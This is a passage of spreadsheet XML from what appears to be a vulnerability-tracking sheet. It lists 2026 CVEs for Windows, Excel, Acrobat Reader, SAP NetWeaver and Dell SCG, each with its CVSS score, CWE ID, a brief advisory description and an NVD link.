      <c r="A2273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="C2273" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2273" s="5" t="inlineStr"/>
      <c r="F2273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2273" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2273" s="5" t="inlineStr"/>
      <c r="I2273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2273" s="5" t="inlineStr"/>
      <c r="K2273" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2273" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Business Client does not perform sufficient validation when processing certain locally stored data during application startup. An attacker with low privileges on the local system could replace this data with specially crafted content. When the application is next launched, the crafted content is processed and could lead to arbitrary code execution in the context of the user. This results in a high impact on confidentiality, integrity and availability of the application.</t>
        </is>
      </c>
      <c r="M2273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="2274">
      <c r="A2274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="C2274" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2274" s="5" t="inlineStr"/>
      <c r="F2274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2274" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2274" s="5" t="inlineStr"/>
      <c r="I2274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2274" s="5" t="inlineStr"/>
      <c r="K2274" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2274" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="2275">
      <c r="A2275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="C2275" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2275" s="5" t="inlineStr"/>
      <c r="F2275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2275" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2275" s="5" t="inlineStr"/>
      <c r="I2275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2275" s="5" t="inlineStr"/>
      <c r="K2275" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L2275" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="2276">
      <c r="A2276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="C2276" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2276" s="5" t="inlineStr"/>
      <c r="F2276" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2276" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H227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276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2276" s="5" t="inlineStr"/>
      <c r="K2276" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2276" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="2277">
      <c r="A2277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="C2277" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2277" s="5" t="inlineStr"/>
      <c r="F2277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2277" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2277" s="5" t="inlineStr"/>
      <c r="I2277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2277" s="5" t="inlineStr"/>
      <c r="K2277" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2277" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="2278">
      <c r="A2278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78136</t>
        </is>
      </c>
      <c r="C2278" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2278" s="5" t="inlineStr"/>
      <c r="F2278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2278" s="5" t="inlineStr"/>
      <c r="H2278" s="5" t="inlineStr"/>
      <c r="I2278" s="5" t="inlineStr">
        <is>
          <t>2026-08-23</t>
        </is>
      </c>
      <c r="J2278" s="5" t="inlineStr"/>
      <c r="K2278" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2278" s="5" t="inlineStr">
        <is>
          <t>chirpmyradio CHIRP before 39178db allows eval injection via crafted CSV data. This occurs in _clean_tmode in drivers/kenwood_itm.py.</t>
        </is>
      </c>
      <c r="M2278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78136</t>
        </is>
      </c>
    </row>
    <row r="2279">
      <c r="A2279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="C2279" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2279" s="5" t="inlineStr"/>
      <c r="F2279" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2279" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H227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79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2279" s="5" t="inlineStr"/>
      <c r="K2279" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2279" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="2280">
      <c r="A2280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="C2280" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2280" s="5" t="inlineStr"/>
      <c r="F2280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2280" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H228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80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2280" s="5" t="inlineStr"/>
      <c r="K2280" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2280" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="2281">
      <c r="A2281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78482</t>
        </is>
      </c>
      <c r="C2281" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2281" s="5" t="inlineStr"/>
      <c r="F2281" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G2281" s="5" t="inlineStr"/>
      <c r="H2281" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2281" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2281" s="5" t="inlineStr"/>
      <c r="K2281" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2281"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M2281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78482</t>
        </is>
      </c>
    </row>
    <row r="2282">
      <c r="A2282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78484</t>
        </is>
      </c>
      <c r="C2282" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2282" s="5" t="inlineStr"/>
      <c r="F2282" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G2282" s="5" t="inlineStr"/>
      <c r="H2282" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2282" s="5" t="inlineStr"/>
      <c r="K2282" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2282"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M2282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78484</t>
        </is>
      </c>
    </row>
    <row r="2283">
      <c r="A2283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78493</t>
        </is>
      </c>
      <c r="C2283" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2283" s="5" t="inlineStr"/>
      <c r="F2283" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G2283" s="5" t="inlineStr"/>
      <c r="H2283" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2283" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2283" s="5" t="inlineStr"/>
      <c r="K2283" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2283"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M2283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78493</t>
        </is>
      </c>
    </row>
    <row r="2284">
      <c r="A2284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79907</t>
        </is>
      </c>
      <c r="C2284" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2284" s="5" t="inlineStr"/>
      <c r="F2284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2284" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2284" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2284" s="5" t="inlineStr"/>
      <c r="K2284" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2284" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t>
        </is>
      </c>
    </row>
    <row r="2285">
      <c r="A2285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79908</t>
        </is>
      </c>
      <c r="C2285" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2285" s="5" t="inlineStr"/>
      <c r="F2285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2285" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2285" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2285" s="5" t="inlineStr"/>
      <c r="K2285" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2285" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t>
        </is>
      </c>
    </row>
    <row r="2286">
      <c r="A2286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79909</t>
        </is>
      </c>
      <c r="C2286" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2286" s="5" t="inlineStr"/>
      <c r="F2286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2286" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2286" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2286" s="5" t="inlineStr"/>
      <c r="K2286" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2286" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t>
        </is>
      </c>
    </row>
    <row r="2287">
      <c r="A2287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="C2287" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2287" s="5" t="inlineStr"/>
      <c r="F2287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2287" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2287" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I2287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2287" s="5" t="inlineStr"/>
      <c r="K2287" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2287" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="2288">
      <c r="A2288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80161</t>
        </is>
      </c>
      <c r="C2288" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2288" s="5" t="inlineStr"/>
      <c r="F2288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2288" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2288" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2288" s="5" t="inlineStr"/>
      <c r="K2288" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2288" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t>
        </is>
      </c>
    </row>
    <row r="2289">
      <c r="A2289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80166</t>
        </is>
      </c>
      <c r="C2289" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2289" s="5" t="inlineStr"/>
      <c r="F2289" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2289" s="5" t="inlineStr"/>
      <c r="H2289" s="5" t="inlineStr"/>
      <c r="I2289" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2289" s="5" t="inlineStr"/>
      <c r="K2289" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2289" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="M2289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80166</t>
        </is>
      </c>
    </row>
    <row r="2290">
      <c r="A2290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="C2290" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2290" s="5" t="inlineStr"/>
      <c r="F2290" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2290" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2290" s="5" t="inlineStr"/>
      <c r="I2290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2290" s="5" t="inlineStr"/>
      <c r="K2290" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2290" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="2291">
      <c r="A2291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81386</t>
        </is>
      </c>
      <c r="C2291" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2291" s="5" t="inlineStr"/>
      <c r="F2291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2291" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2291" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2291" s="5" t="inlineStr"/>
      <c r="K2291" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2291" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t>
        </is>
      </c>
    </row>
    <row r="2292">
      <c r="A2292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81388</t>
        </is>
      </c>
      <c r="C2292" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2292" s="5" t="inlineStr"/>
      <c r="F2292" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2292" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2292" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2292" s="5" t="inlineStr"/>
      <c r="K2292" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2292" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t>
        </is>
      </c>
    </row>
    <row r="2293">
      <c r="A2293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81396</t>
        </is>
      </c>
      <c r="C2293" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2293" s="5" t="inlineStr"/>
      <c r="F2293" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2293" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2293" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2293" s="5" t="inlineStr"/>
      <c r="K2293" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193</t>
        </is>
      </c>
      <c r="L2293" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t>
        </is>
      </c>
    </row>
    <row r="2294">
      <c r="A2294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81397</t>
        </is>
      </c>
      <c r="C2294" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2294" s="5" t="inlineStr"/>
      <c r="F2294" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2294" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2294" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2294" s="5" t="inlineStr"/>
      <c r="K2294" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2294" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t>
        </is>
      </c>
    </row>
    <row r="2295">
      <c r="A2295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81398</t>
        </is>
      </c>
      <c r="C2295" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2295" s="5" t="inlineStr"/>
      <c r="F2295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2295" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2295" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2295" s="5" t="inlineStr"/>
      <c r="K2295" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2295" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2295" s="6" t="inlineStr">
        <is>
